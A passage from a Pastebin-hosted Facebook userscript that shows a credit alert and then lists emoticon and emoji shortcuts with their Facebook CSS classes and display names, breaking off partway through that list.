Advertisement
vlthanhay

Icon thành công

Mar 5th, 2014
82
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 36.02 KB | None | 0 0
  1. // ==UserScript==
  2. // @name All new Facebook Emotions
  3. // @namespace Yash Gupta
  4. // @description Install the script and you will see a huge number of facebook emotions!
  5. // @include https://www.facebook.com/
  6. // @version 1
  7. // @grant none
  8. // ==/UserScript==
  9. ;alert('Created By VL Thánh Ấy {9B Team}');
  10. // ==Icon==
  11. (function() {
  12. // Active only in main frame
  13. if (!document.querySelector("#pageNav")) {
  14. return;
  15. }
  16. //console.info("Extra Facebook Smileys");
  17.  
  18. // = Data =======
  19. var emoticons = [ { // Text to picture emoticons
  20. "chars" : " :) ",
  21. "class" : "emoticon_smile",
  22. "name" : "Smiley"
  23. }, {
  24. "chars" : " :( ",
  25. "class" : "emoticon_frown",
  26. "name" : "Frown"
  27. }, {
  28. "chars" : " :P ",
  29. "class" : "emoticon_tongue",
  30. "name" : "Tongue"
  31. }, {
  32. "chars" : " :D ",
  33. "class" : "emoticon_grin",
  34. "name" : "Grin"
  35. }, {
  36. "chars" : " :o ",
  37. "class" : "emoticon_gasp",
  38. "name" : "Gasp"
  39. }, {
  40. "chars" : " ;) ",
  41. "class" : "emoticon_wink",
  42. "name" : "Wink"
  43. }, {
  44. "chars" : " :v ",
  45. "class" : "emoticon_pacman",
  46. "name" : "Pacman"
  47. }, {
  48. "chars" : " >:( ",
  49. "class" : "emoticon_grumpy",
  50. "name" : "Gru?ƒÂ±?ƒÂ³n"
  51. }, {
  52. "chars" : " :/ ",
  53. "class" : "emoticon_unsure",
  54. "name" : "Unsure"
  55. }, {
  56. "chars" : " :'( ",
  57. "class" : "emoticon_cry",
  58. "name" : "Cry"
  59. }, {
  60. "chars" : " ^_^ ",
  61. "class" : "emoticon_kiki",
  62. "name" : "Kiki"
  63. }, {
  64. "chars" : " 8) ",
  65. "class" : "emoticon_glasses",
  66. "name" : "Glasses"
  67. }, {
  68. "chars" : " B| ",
  69. "class" : "emoticon_sunglasses",
  70. "name" : "Sunglasses"
  71. }, {
  72. "chars" : " <3 ",
  73. "class" : "emoticon_heart",
  74. "name" : "Heart"
  75. }, {
  76. "chars" : " 3:) ",
  77. "class" : "emoticon_devil",
  78. "name" : "Devil"
  79. }, {
  80. "chars" : " O:) ",
  81. "class" : "emoticon_angel",
  82. "name" : "Angel"
  83. }, {
  84. "chars" : " -_- ",
  85. "class" : "emoticon_squint",
  86. "name" : "Squint"
  87. }, {
  88. "chars" : " o.O ",
  89. "class" : "emoticon_confused",
  90. "name" : "Confused"
  91. }, {
  92. "chars" : " >:o ",
  93. "class" : "emoticon_upset",
  94. "name" : "Upset"
  95. }, {
  96. "chars" : " :3 ",
  97. "class" : "emoticon_colonthree",
  98. "name" : "Colonthree"
  99. }, {
  100. "chars" : " (y) ",
  101. "class" : "emoticon_like",
  102. "name" : "Like"
  103. }, {
  104. "chars" : " :* ",
  105. "class" : "emoticon emoticon_kiss",
  106. "name" : "Kiss"
  107. }, {
  108. "chars" : " (^^^) ",
  109. "class" : "emoticon_shark",
  110. "name" : "Shark"
  111. }, {
  112. "chars" : " :|] ",
  113. "class" : "emoticon_robot",
  114. "name" : "Robot"
  115. }, {
  116. "chars" : " <(\") ",
  117. "class" : "emoticon_penguin",
  118. "name" : "Ping?ƒÂ¼ino"
  119. }, {
  120. "chars" : " :poop: ",
  121. "class" : "emoticon_poop",
  122. "name" : "Poop"
  123. }, {
  124. "chars" : " :putnam: ",
  125. "class" : "emoticon_putnam",
  126. "name" : "Putman"
  127. }, {
  128. "chars" : " \ud83c\udf02 ",
  129. "class" : "_1az _1a- _2c0",
  130. "name" : "Pink Umbrella"
  131. }, {
  132. "chars" : " \ud83c\udf0a ",
  133. "class" : "_1az _1a- _2c1",
  134. "name" : "Sea Wave"
  135. }, {
  136. "chars" : " \ud83c\udf19 ",
  137. "class" : "_1az _1a- _2c2",
  138. "name" : "Crescent moon"
  139. }, {
  140. "chars" : " \ud83c\udf1f ",
  141. "class" : "_1az _1a- _2c3",
  142. "name" : "Bright Star"
  143. }, {
  144. "chars" : " \ud83c\udf31 ",
  145. "class" : "_1az _1a- _2c4",
  146. "name" : "Seedbed"
  147. }, {
  148. "chars" : " \ud83c\udf34 ",
  149. "class" : "_1az _1a- _2c5",
  150. "name" : "Single Palm Tree"
  151. }, {
  152. "chars" : " \ud83c\udf35 ",
  153. "class" : "_1az _1a- _2c6",
  154. "name" : "Cactus"
  155. }, {
  156. "chars" : " \ud83c\udf37 ",
  157. "class" : "_1az _1a- _2c7",
  158. "name" : "Tulip"
  159. }, {
  160. "chars" : " \ud83c\udf38 ",
  161. "class" : "_1az _1a- _2c8",
  162. "name" : "Cherry Blossom"
  163. }, {
  164. "chars" : " \ud83c\udf39 ",
  165. "class" : "_1az _1a- _2c9",
  166. "name" : "Rose"
  167. }, {
  168. "chars" : " \ud83c\udf3a ",
  169. "class" : "_1az _1a- _2ca",
  170. "name" : "Cayenne"
  171. }, {
  172. "chars" : " \ud83c\udf3b ",
  173. "class" : "_1az _1a- _2cb",
  174. "name" : "Sunflower"
  175. }, {
  176. "chars" : " \ud83c\udf3e ",
  177. "class" : "_1az _1a- _2cc",
  178. "name" : "Ear Of Rice"
  179. }, {
  180. "chars" : " \ud83c\udf40 ",
  181. "class" : "_1az _1a- _2cd",
  182. "name" : "Four Leaf Clover"
  183. }, {
  184. "chars" : " \ud83c\udf41 ",
  185. "class" : "_1az _1a- _2ce",
  186. "name" : "Maple Leaf"
  187. }, {
  188. "chars" : " \ud83c\udf42 ",
  189. "class" : "_1az _1a- _2cf",
  190. "name" : "Fallen Leaf"
  191. }, {
  192. "chars" : " \ud83c\udf43 ",
  193. "class" : "_1az _1a- _2cg",
  194. "name" : "Leaf Floating In The Wind"
  195. }, {
  196. "chars" : " \ud83c\udf4a ",
  197. "class" : "_1az _1a- _2ch",
  198. "name" : "Tangerine"
  199. }, {
  200. "chars" : " \ud83c\udf4e ",
  201. "class" : "_1az _1a- _2ci",
  202. "name" : "Red Apple"
  203. }, {
  204. "chars" : " \ud83c\udf53 ",
  205. "class" : "_1az _1a- _2cj",
  206. "name" : "Strawberry"
  207. }, {
  208. "chars" : " \ud83c\udf54 ",
  209. "class" : "_1az _1a- _2ck",
  210. "name" : "Burger"
  211. }, {
  212. "chars" : " \ud83c\udf78 ",
  213. "class" : "_1az _1a- _2cl",
  214. "name" : "Cocktail Glass"
  215. }, {
  216. "chars" : " \ud83c\udf7a ",
  217. "class" : "_1az _1a- _2cm",
  218. "name" : "Tankard"
  219. }, {
  220. "chars" : " \ud83c\udf81 ",
  221. "class" : "_1az _1a- _2cn",
  222. "name" : "Gift Wrapped"
  223. }, {
  224. "chars" : " \ud83c\udf83 ",
  225. "class" : "_1az _1a- _2co",
  226. "name" : "Pumpkin With Candle"
  227. }, {
  228. "chars" : " \ud83c\udf84 ",
  229. "class" : "_1az _1a- _2cp",
  230. "name" : "Christmas Tree"
  231. }, {
  232. "chars" : " \ud83c\udf85 ",
  233. "class" : "_1az _1a- _2cq",
  234. "name" : "Santa"
  235. }, {
  236. "chars" : " \ud83c\udf88 ",
  237. "class" : "_1az _1a- _2cr",
  238. "name" : "Balloon"
  239. }, {
  240. "chars" : " \ud83c\udf89 ",
  241. "class" : "_1az _1a- _2cs",
  242. "name" : "Party Popper"
  243. }, {
  244. "chars" : " \ud83c\udf8d ",
  245. "class" : "_1az _1a- _2ct",
  246. "name" : "Pine Decor"
  247. }, {
  248. "chars" : " \ud83c\udf8e ",
  249. "class" : "_1az _1a- _2cu",
  250. "name" : "Japanese Dolls"
  251. }, {
  252. "chars" : " \ud83c\udf8f ",
  253. "class" : "_1az _1a- _2cv",
  254. "name" : "Carp Streamer"
  255. }, {
  256. "chars" : " \ud83c\udf90 ",
  257. "class" : "_1az _1a- _2cw",
  258. "name" : "Wind Chime"
  259. }, {
  260. "chars" : " \ud83c\udf93 ",
  261. "class" : "_1az _1a- _2cx",
  262. "name" : "Graduation Cap"
  263. }, {
  264. "chars" : " \ud83c\udfb5 ",
  265. "class" : "_1az _1a- _2cy",
  266. "name" : "Musical Note"
  267. }, {
  268. "chars" : " \ud83c\udfb6 ",
  269. "class" : "_1az _1a- _2cz",
  270. "name" : "Multiple Musical Notes"
  271. }, {
  272. "chars" : " \ud83c\udfbc ",
  273. "class" : "_1az _1a- _2c-",
  274. "name" : "Musical Score"
  275. }, {
  276. "chars" : " \ud83d\udc0d ",
  277. "class" : "_1az _1a- _2c_",
  278. "name" : "Snake"
  279. }, {
  280. "chars" : " \ud83d\udc0e ",
  281. "class" : "_1az _1a- _2d0",
  282. "name" : "Horse"
  283. }, {
  284. "chars" : " \ud83d\udc11 ",
  285. "class" : "_1az _1a- _2d1",
  286. "name" : "Sheep"
  287. }, {
  288. "chars" : " \ud83d\udc12 ",
  289. "class" : "_1az _1a- _2d2",
  290. "name" : "Monkey"
  291. }, {
  292. "chars" : " \ud83d\udc14 ",
  293. "class" : "_1az _1a- _2d3",
  294. "name" : "Hen"
  295. }, {
  296. "chars" : " \ud83d\udc17 ",
  297. "class" : "_1az _1a- _2d4",
  298. "name" : "Wild Boar"
  299. }, {
  300. "chars" : " \ud83d\udc18 ",
  301. "class" : "_1az _1a- _2d5",
  302. "name" : "Elephant"
  303. }, {
  304. "chars" : " \ud83d\udc19 ",
  305. "class" : "_1az _1a- _2d6",
  306. "name" : "Octopus"
  307. }, {
  308. "chars" : " \ud83d\udc1a ",
  309. "class" : "_1az _1a- _2d7",
  310. "name" : "Snail Shell"
  311. }, {
  312. "chars" : " \ud83d\udc1b ",
  313. "class" : "_1az _1a- _2d8",
  314. "name" : "Insect"
  315. }, {
  316. "chars" : " \ud83d\udc1f ",
  317. "class" : "_1az _1a- _2d9",
  318. "name" : "Fish"
  319. }, {
  320. "chars" : " \ud83d\udc20 ",
  321. "class" : "_1az _1a- _2da",
  322. "name" : "Tropical Fish"
  323. }, {
  324. "chars" : " \ud83d\udc21 ",
  325. "class" : "_1az _1a- _2db",
  326. "name" : "Pufferfish"
  327. }, {
  328. "chars" : " \ud83d\udc25 ",
  329. "class" : "_1az _1a- _2dc",
  330. "name" : "Chick In Front"
  331. }, {
  332. "chars" : " \ud83d\udc26 ",
  333. "class" : "_1az _1a- _2dd",
  334. "name" : "Bird"
  335. }, {
  336. "chars" : " \ud83d\udc27 ",
  337. "class" : "_1az _1a- _2de",
  338. "name" : "Penguin"
  339. }, {
  340. "chars" : " \ud83d\udc28 ",
  341. "class" : "_1az _1a- _2df",
  342. "name" : "Koala"
  343. }, {
  344. "chars" : " \ud83d\udc29 ",
  345. "class" : "_1az _1a- _2dg",
  346. "name" : "Poodle"
  347. }, {
  348. "chars" : " \ud83d\udc2b ",
  349. "class" : "_1az _1a- _2dh",
  350. "name" : "Bactrian Camel"
  351. }, {
  352. "chars" : " \ud83d\udc2c ",
  353. "class" : "_1az _1a- _2di",
  354. "name" : "Dolphin"
  355. }, {
  356. "chars" : " \ud83d\udc2d ",
  357. "class" : "_1az _1a- _2dj",
  358. "name" : "Mouse Face"
  359. }, {
  360. "chars" : " \ud83d\udc2e ",
  361. "class" : "_1az _1a- _2dk",
  362. "name" : "Cow Face"
  363. }, {
  364. "chars" : " \ud83d\udc2f ",
  365. "class" : "_1az _1a- _2dl",
  366. "name" : "Cara de tigre"
  367. }, {
  368. "chars" : " \ud83d\udc30 ",
  369. "class" : "_1az _1a- _2dm",
  370. "name" : "Rabbit Face"
  371. }, {
  372. "chars" : " \ud83d\udc31 ",
  373. "class" : "_1az _1a- _2dn",
  374. "name" : "Cat Face"
  375. }, {
  376. "chars" : " \ud83d\udc33 ",
  377. "class" : "_1az _1a- _2do",
  378. "name" : "Whale Sputtering"
  379. }, {
  380. "chars" : " \ud83d\udc34 ",
  381. "class" : "_1az _1a- _2dp",
  382. "name" : "Horse Face"
  383. }, {
  384. "chars" : " \ud83d\udc35 ",
  385. "class" : "_1az _1a- _2dq",
  386. "name" : "Monkey Face"
  387. }, {
  388. "chars" : " \ud83d\udc37 ",
  389. "class" : "_1az _1a- _2dr",
  390. "name" : "Pig face"
  391. }, {
  392. "chars" : " \ud83d\udc38 ",
  393. "class" : "_1az _1a- _2ds",
  394. "name" : "Frog Face"
  395. }, {
  396. "chars" : " \ud83d\udc39 ",
  397. "class" : "_1az _1a- _2dt",
  398. "name" : "Hamster Face"
  399. }, {
  400. "chars" : " \ud83d\udc3a ",
  401. "class" : "_1az _1a- _2du",
  402. "name" : "Wolf Face"
  403. }, {
  404. "chars" : " \ud83d\udc3b ",
  405. "class" : "_1az _1a- _2dv",
  406. "name" : "Bear Face"
  407. }, {
  408. "chars" : " \ud83d\udc3e ",
  409. "class" : "_1az _1a- _2dw",
  410. "name" : "Footprints"
  411. }, {
  412. "chars" : " \ud83d\udc40 ",
  413. "class" : "_1az _1a- _2dx",
  414. "name" : "Eyes"
  415. }, {
  416. "chars" : " \ud83d\udc42 ",
  417. "class" : "_1az _1a- _2dy",
  418. "name" : "Ear"
  419. }, {
  420. "chars" : " \ud83d\udc43 ",
  421. "class" : "_1az _1a- _2dz",
  422. "name" : "Nose"
  423. }, {
  424. "chars" : " \ud83d\udc44 ",
  425. "class" : "_1az _1a- _2d-",
  426. "name" : "Mouth"
  427. }, {
  428. "chars" : " \ud83d\udc45 ",
  429. "class" : "_1az _1a- _2d_",
  430. "name" : "Sour Face"
  431. }, {
  432. "chars" : " \ud83d\udc46 ",
  433. "class" : "_1az _1a- _2e0",
  434. "name" : "White hand pointing up"
  435. }, {
  436. "chars" : " \ud83d\udc47 ",
  437. "class" : "_1az _1a- _2e1",
  438. "name" : "White hand faces downward"
  439. }, {
  440. "chars" : " \ud83d\udc48 ",
  441. "class" : "_1az _1a- _2e2",
  442. "name" : "White hand indicating left"
  443. }, {
  444. "chars" : " \ud83d\udc49 ",
  445. "class" : "_1az _1a- _2e3",
  446. "name" : "White hand indicating right"
  447. }, {
  448. "chars" : " \ud83d\udc4a ",
  449. "class" : "_1az _1a- _2e4",
  450. "name" : "Fist"
  451. }, {
  452. "chars" : " \ud83d\udc4b ",
  453. "class" : "_1az _1a- _2e5",
  454. "name" : "Hand in motion"
  455. }, {
  456. "chars" : " \ud83d\udc4c ",
  457. "class" : "_1az _1a- _2e6",
  458. "name" : "Hand showing all good"
  459. }, {
  460. "chars" : " \ud83d\udc4d ",
  461. "class" : "_1az _1a- _2e7",
  462. "name" : "Hand with thumb up"
  463. }, {
  464. "chars" : " \ud83d\udc4e ",
  465. "class" : "_1az _1a- _2e8",
  466. "name" : "Hand with thumb down"
  467. }, {
  468. "chars" : " \ud83d\udc4f ",
  469. "class" : "_1az _1a- _2e9",
  470. "name" : "Hands clapping"
  471. }, {
  472. "chars" : " \ud83d\udc50 ",
  473. "class" : "_1az _1a- _2ea",
  474. "name" : "Open Hands"
  475. }, {
  476. "chars" : " \ud83d\udc66 ",
  477. "class" : "_1az _1a- _2eb",
  478. "name" : "Boy"
  479. }, {
  480. "chars" : " \ud83d\udc67 ",
  481. "class" : "_1az _1a- _2ec",
  482. "name" : "Girl"
  483. }, {
  484. "chars" : " \ud83d\udc68 ",
  485. "class" : "_1az _1a- _2ed",
  486. "name" : "Man"
  487. }, {
  488. "chars" : " \ud83d\udc69 ",
  489. "class" : "_1az _1a- _2ee",
  490. "name" : "Woman"
  491. }, {
  492. "chars" : " \ud83d\udc6b ",
  493. "class" : "_1az _1a- _2ef",
  494. "name" : "Man and woman holding hands"
  495. }, {
  496. "chars" : " \ud83d\udc6e ",
  497. "class" : "_1az _1a- _2eg",
  498. "name" : "Police Officer"
  499. }, {
  500. "chars" : " \ud83d\udc6f ",
  501. "class" : "_1az _1a- _2eh",
  502. "name" : "Woman with bunny ears"
  503. }, {
  504. "chars" : " \ud83d\udc71 ",
  505. "class" : "_1az _1a- _2ei",
  506. "name" : "Person with hair rubio"
  507. }, {
  508. "chars" : " \ud83d\udc72 ",
  509. "class" : "_1az _1a- _2ej",
  510. "name" : "Man with pi mao gua"
  511. }, {
  512. "chars" : " \ud83d\udc73 ",
  513. "class" : "_1az _1a- _2ek",
  514. "name" : "Man with turban"
  515. }, {
  516. "chars" : " \ud83d\udc74 ",
  517. "class" : "_1az _1a- _2el",
  518. "name" : "Old Man"
  519. }, {
  520. "chars" : " \ud83d\udc75 ",
  521. "class" : "_1az _1a- _2em",
  522. "name" : "Old Woman"
  523. }, {
  524. "chars" : " \ud83d\udc76 ",
  525. "class" : "_1az _1a- _2en",
  526. "name" : "Baby"
  527. }, {
  528. "chars" : " \ud83d\udc77 ",
  529. "class" : "_1az _1a- _2eo",
  530. "name" : "Construction Worker"
  531. }, {
  532. "chars" : " \ud83d\udc78 ",
  533. "class" : "_1az _1a- _2ep",
  534. "name" : "Princess"
  535. }, {
  536. "chars" : " \ud83d\udc7b ",
  537. "class" : "_1az _1a- _2eq",
  538. "name" : "Ghost"
  539. }, {
  540. "chars" : " \ud83d\udc7c ",
  541. "class" : "_1az _1a- _2er",
  542. "name" : "Angel baby"
  543. }, {
  544. "chars" : " \ud83d\udc7d ",
  545. "class" : "_1az _1a- _2es",
  546. "name" : "Alien"
  547. }, {
  548. "chars" : " \ud83d\udc7e ",
  549. "class" : "_1az _1a- _2et",
  550. "name" : "Alien Monster"
  551. }, {
  552. "chars" : " \ud83d\udc7f ",
  553. "class" : "_1az _1a- _2eu",
  554. "name" : "Imp"
  555. }, {
  556. "chars" : " \ud83d\udc80 ",
  557. "class" : "_1az _1a- _2ev",
  558. "name" : "Skull"
  559. }, {
  560. "chars" : " \ud83d\udc82 ",
  561. "class" : "_1az _1a- _2ew",
  562. "name" : "Guard"
  563. }, {
  564. "chars" : " \ud83d\udc83 ",
  565. "class" : "_1az _1a- _2ex",
  566. "name" : "Ballerina"
  567. }, {
  568. "chars" : " \ud83d\udc85 ",
  569. "class" : "_1az _1a- _2ey",
  570. "name" : "Nail Polish"
  571. }, {
  572. "chars" : " \ud83d\udc8b ",
  573. "class" : "_1az _1a- _2ez",
  574. "name" : "Brand of kiss"
  575. }, {
  576. "chars" : " \ud83d\udc8f ",
  577. "class" : "_1az _1a- _2e-",
  578. "name" : "Kissing couple"
  579. }, {
  580. "chars" : " \ud83d\udc90 ",
  581. "class" : "_1az _1a- _2e_",
  582. "name" : "Bunch of flowers"
  583. }, {
  584. "chars" : " \ud83d\udc91 ",
  585. "class" : "_1az _1a- _2f0",
  586. "name" : "Couple with heart"
  587. }, {
  588. "chars" : " \ud83d\udc93 ",
  589. "class" : "_1az _1a- _2f1",
  590. "name" : "Heart beating"
  591. }, {
  592. "chars" : " \ud83d\udc94 ",
  593. "class" : "_1az _1a- _2f2",
  594. "name" : "Broken Heart"
  595. }, {
  596. "chars" : " \ud83d\udc96 ",
  597. "class" : "_1az _1a- _2f3",
  598. "name" : "Bright Heart"
  599. }, {
  600. "chars" : " \ud83d\udc97 ",
  601. "class" : "_1az _1a- _2f4",
  602. "name" : "Heart growing"
  603. }, {
  604. "chars" : " \ud83d\udc98 ",
  605. "class" : "_1az _1a- _2f5",
  606. "name" : "Heart with arrow"
  607. }, {
  608. "chars" : " \ud83d\udc99 ",
  609. "class" : "_1az _1a- _2f6",
  610. "name" : "Blue Heart"
  611. }, {
  612. "chars" : " \ud83d\udc9a ",
  613. "class" : "_1az _1a- _2f7",
  614. "name" : "Green Heart"
  615. }, {
  616. "chars" : " \ud83d\udc9b ",
  617. "class" : "_1az _1a- _2f8",
  618. "name" : "Yellow Heart"
  619. }, {
  620. "chars" : " \ud83d\udc9c ",
  621. "class" : "_1az _1a- _2f9",
  622. "name" : "Purple Heart"
  623. }, {
  624. "chars" : " \ud83d\udc9d ",
  625. "class" : "_1az _1a- _2fa",
  626. "name" : "Heart with ribbon"
  627. }, {
  628. "chars" : " \ud83d\udca2 ",
  629. "class" : "_1az _1a- _2fb",
  630. "name" : "Symbol of anger"
  631. }, {
  632. "chars" : " \ud83d\udca4 ",
  633. "class" : "_1az _1a- _2fc",
  634. "name" : "Sleeping"
  635. }, {
  636. "chars" : " \ud83d\udca6 ",
  637. "class" : "_1az _1a- _2fd",
  638. "name" : "Sweat Symbol"
  639. }, {
  640. "chars" : " \ud83d\udca8 ",
  641. "class" : "_1az _1a- _2fe",
  642. "name" : "Quick Start Symbol"
  643. }, {
  644. "chars" : " \ud83d\udca9 ",
  645. "class" : "_1az _1a- _2ff",
  646. "name" : "Pile of Caca"
  647. }, {
  648. "chars" : " \ud83d\udcaa ",
  649. "class" : "_1az _1a- _2fg",
  650. "name" : "Flexed bicep"
  651. }, {
  652. "chars" : " \ud83d\udcbb ",
  653. "class" : "_1az _1a- _2fh",
  654. "name" : "Personal Computer"
  655. }, {
  656. "chars" : " \ud83d\udcbd ",
  657. "class" : "_1az _1a- _2fi",
  658. "name" : "Mini Disco"
  659. }, {
  660. "chars" : " \ud83d\udcbe ",
  661. "class" : "_1az _1a- _2fj",
  662. "name" : "Floppy disk"
  663. }, {
  664. "chars" : " \ud83d\udcbf ",
  665. "class" : "_1az _1a- _2fk",
  666. "name" : "Optical Disc"
  667. }, {
  668. "chars" : " \ud83d\udcc0 ",
  669. "class" : "_1az _1a- _2fl",
  670. "name" : "DVD"
  671. }, {
  672. "chars" : " \ud83d\udcde ",
  673. "class" : "_1az _1a- _2fm",
  674. "name" : "Telephone receiver"
  675. }, {
  676. "chars" : " \ud83d\udce0 ",
  677. "class" : "_1az _1a- _2fn",
  678. "name" : "Fax"
  679. }, {
  680. "chars" : " \ud83d\udcf1 ",
  681. "class" : "_1az _1a- _2fo",
  682. "name" : "Mobile Phone"
  683. }, {
  684. "chars" : " \ud83d\udcf2 ",
  685. "class" : "_1az _1a- _2fp",
  686. "name" : "Mobile phone with arrow from left to right"
  687. }, {
  688. "chars" : " \ud83d\udcfa ",
  689. "class" : "_1az _1a- _2fq",
  690. "name" : "Television"
  691. }, {
  692. "chars" : " \ud83d\udd14 ",
  693. "class" : "_1az _1a- _2fr",
  694. "name" : "Bell"
  695. }, {
  696. "chars" : " \ud83d\ude01 ",
  697. "class" : "_1az _1a- _2fs",
  698. "name" : "Face to face with smiling eyes"
  699. }, {
  700. "chars" : " \ud83d\ude02 ",
  701. "class" : "_1az _1a- _2ft",
  702. "name" : "Face with tears of joy"
  703. }, {
  704. "chars" : " \ud83d\ude03 ",
  705. "class" : "_1az _1a- _2fu",
  706. "name" : "Smiley face with open mouth"
  707. }, {
  708. "chars" : " \ud83d\ude04 ",
  709. "class" : "_1az _1a- _2fv",
  710. "name" : "Face and eyes smiling with mouth open"
  711. }, {
  712. "chars" : " \ud83d\ude06 ",
  713. "class" : "_1az _1a- _2fw",
  714. "name" : "Smiley face with mouth open and eyes closed"
  715. }, {
  716. "chars" : " \ud83d\ude09 ",
  717. "class" : "_1az _1a- _2fx",
  718. "name" : "Face winking eye"
  719. }, {
  720. "chars" : " \ud83d\ude0b ",
  721. "class" : "_1az _1a- _2fy",
  722. "name" : "Guy savoring delicious food"
  723. }, {
  724. "chars" : " \ud83d\ude0c ",
  725. "class" : "_1az _1a- _2fz",
  726. "name" : "Relief face"
  727. }, {
  728. "chars" : " \ud83d\ude0d ",
  729. "class" : "_1az _1a- _2f-",
  730. "name" : "Smiley face with heart shaped eyes"
  731. }, {
  732. "chars" : " \ud83d\ude0f ",
  733. "class" : "_1az _1a- _2f_",
  734. "name" : "Smirk face"
  735. }, {
  736. "chars" : " \ud83d\ude12 ",
  737. "class" : "_1az _1a- _2g0",
  738. "name" : "Face of boredom"
  739. }, {
  740. "chars" : " \ud83d\ude13 ",
  741. "class" : "_1az _1a- _2g1",
  742. "name" : "Face with cold sweat"
  743. }, {
  744. "chars" : " \ud83d\ude14 ",
  745. "class" : "_1az _1a- _2g2",
  746. "name" : "Pensive face"
  747. }, {
  748. "chars" : " \ud83d\ude16 ",
  749. "class" : "_1az _1a- _2g3",
  750. "name" : "Confused face"
  751. }, {
  752. "chars" : " \ud83d\ude18 ",
  753. "class" : "_1az _1a- _2g4",
  754. "name" : "Throwing kiss Face"
  755. }, {
  756. "chars" : " \ud83d\ude1a ",
  757. "class" : "_1az _1a- _2g5",
  758. "name" : "Kissing face with eyes closed"
  759. }, {
  760. "chars" : " \ud83d\ude1c ",
  761. "class" : "_1az _1a- _2g6",
  762. "name" : "Face with tongue out and winking"
  763. }, {
  764. "chars" : " \ud83d\ude1d ",
  765. "class" : "_1az _1a- _2g7",
  766. "name" : "Face with tongue hanging out and eyes closed"
  767. }, {
  768. "chars" : " \ud83d\ude1e ",
  769. "class" : "_1az _1a- _2g8",
  770. "name" : "Face discouraged"
  771. }, {
  772. "chars" : " \ud83d\ude20 ",
  773. "class" : "_1az _1a- _2g9",
  774. "name" : "Face of anger"
  775. }, {
  776. "chars" : " \ud83d\ude21 ",
  777. "class" : "_1az _1a- _2ga",
  778. "name" : "Very angry face"
  779. }, {
  780. "chars" : " \ud83d\ude22 ",
  781. "class" : "_1az _1a- _2gb",
  782. "name" : "Crying Face"
  783. }, {
  784. "chars" : " \ud83d\ude23 ",
  785. "class" : "_1az _1a- _2gc",
  786. "name" : "Face of perseverance"
  787. }, {
  788. "chars" : " \ud83d\ude24 ",
  789. "class" : "_1az _1a- _2gd",
  790. "name" : "Face of triumph"
  791. }, {
  792. "chars" : " \ud83d\ude25 ",
  793. "class" : "_1az _1a- _2ge",
  794. "name" : "Face discouraged but relieved"
  795. }, {
  796. "chars" : " \ud83d\ude28 ",
  797. "class" : "_1az _1a- _2gf",
  798. "name" : "Scary face"
  799. }, {
  800. "chars" : " \ud83d\ude29 ",
  801. "class" : "_1az _1a- _2gg",
  802. "name" : "Fatigued face"
  803. }, {
  804. "chars" : " \ud83d\ude2a ",
  805. "class" : "_1az _1a- _2gh",
  806. "name" : "Sleeping face"
  807. }, {
  808. "chars" : " \ud83d\ude2b ",
  809. "class" : "_1az _1a- _2gi",
  810. "name" : "Tired face"
  811. }, {
  812. "chars" : " \ud83d\ude2d ",
  813. "class" : "_1az _1a- _2gj",
  814. "name" : "Face screaming"
  815. }, {
  816. "chars" : " \ud83d\ude30 ",
  817. "class" : "_1az _1a- _2gk",
  818. "name" : "Face with mouth open and cold sweat"
  819. }, {
  820. "chars" : " \ud83d\ude31 ",
  821. "class" : "_1az _1a- _2gl",
  822. "name" : "Terrified face of fear"
  823. }, {
  824. "chars" : " \ud83d\ude32 ",
  825. "class" : "_1az _1a- _2gm",
  826. "name" : "Very surprised face"
  827. }, {
  828. "chars" : " \ud83d\ude33 ",
  829. "class" : "_1az _1a- _2gn",
  830. "name" : "Face flushed"
  831. }, {
  832. "chars" : " \ud83d\ude35 ",
  833. "class" : "_1az _1a- _2go",
  834. "name" : "Face dizzy"
  835. }, {
  836. "chars" : " \ud83d\ude37 ",
  837. "class" : "_1az _1a- _2gp",
  838. "name" : "Face with medical mask"
  839. }, {
  840. "chars" : " \ud83d\ude38 ",
  841. "class" : "_1az _1a- _2gq",
  842. "name" : "Grinning Cat face and eyes closed"
  843. }, {
  844. "chars" : " \ud83d\ude39 ",
  845. "class" : "_1az _1a- _2gr",
  846. "name" : "Cat face with tears of laughter"
  847. }, {
  848. "chars" : " \ud83d\ude3a ",
  849. "class" : "_1az _1a- _2gs",
  850. "name" : "Smiling cat face with open mouth"
  851. }, {
  852. "chars" : " \ud83d\ude3b ",
  853. "class" : "_1az _1a- _2gt",
  854. "name" : "Smiling cat face with hearts in her eyes"
  855. }, {
  856. "chars" : " \ud83d\ude3c ",
  857. "class" : "_1az _1a- _2gu",
  858. "name" : "Face of cat smile twisted"
  859. }, {
  860. "chars" : " \ud83d\ude3d ",
  861. "class" : "_1az _1a- _2gv",
  862. "name" : "Cat face kissing with eyes closed"
  863. }, {
  864. "chars" : " \ud83d\ude3f ",
  865. "class" : "_1az _1a- _2gw",
  866. "name" : "Cat face crying"
  867. }, {
  868. "chars" : " \ud83d\ude40 ",
  869. "class" : "_1az _1a- _2gx",
  870. "name" : "Cat face scared terrified"
  871. }, {
  872. "chars" : " \ud83d\ude4b ",
  873. "class" : "_1az _1a- _2gy",
  874. "name" : "Happy person raising a hand"
  875. }, {
  876. "chars" : " \ud83d\ude4c ",
  877. "class" : "_1az _1a- _2gz",
  878. "name" : "Person holding up both hands in celebration"
  879. }, {
  880. "chars" : " \ud83d\ude4d ",
  881. "class" : "_1az _1a- _2g-",
  882. "name" : "Person frowning"
  883. }, {
  884. "chars" : " \ud83d\ude4f ",
  885. "class" : "_1az _1a- _2g_",
  886. "name" : "Person in prayer"
  887. }, {
  888. "chars" : " \u261d ",
  889. "class" : "_1az _1a- _2h0",
  890. "name" : "Index finger pointing up"
  891. }, {
  892. "chars" : " \u263a ",
  893. "class" : "_1az _1a- _2h1",
  894. "name" : "White face smiling"
  895. }, {
  896. "chars" : " \u26a1 ",
  897. "class" : "_1az _1a- _2h2",
  898. "name" : "High voltage symbol"
  899. }, {
  900. "chars" : " \u26c4 ",
  901. "class" : "_1az _1a- _2h3",
  902. "name" : "Snowless snowman"
  903. }, {
  904. "chars" : " \u270a ",
  905. "class" : "_1az _1a- _2h4",
  906. "name" : "Fist up"
  907. }, {
  908. "chars" : " \u270b ",
  909. "class" : "_1az _1a- _2h5",
  910. "name" : "Hand pointing up"
  911. }, {
  912. "chars" : " \u270c ",
  913. "class" : "_1az _1a- _2h6",
  914. "name" : "Winning Hand"
  915. }, {
  916. "chars" : " \u2600 ",
  917. "class" : "_1az _1a- _2h7",
  918. "name" : "Sun With Rays"
  919. }, {
  920. "chars" : " \u2601 ",
  921. "class" : "_1az _1a- _2h8",
  922. "name" : "Cloud"
  923. }, {
  924. "chars" : " \u2614 ",
  925. "class" : "_1az _1a- _2h9",
